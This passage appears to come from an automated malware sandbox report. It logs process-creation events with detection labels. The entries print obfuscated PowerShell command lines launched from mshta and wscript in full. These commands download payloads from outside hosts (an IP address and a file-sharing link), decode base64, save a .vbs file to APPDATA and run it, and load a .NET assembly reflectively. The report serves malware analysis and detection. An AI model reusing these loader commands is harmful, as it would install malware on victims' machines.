                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"Jump to behavior
                    PowerShell case anomaly found
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"Jump to behavior
                    Suspicious powershell command line found
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, 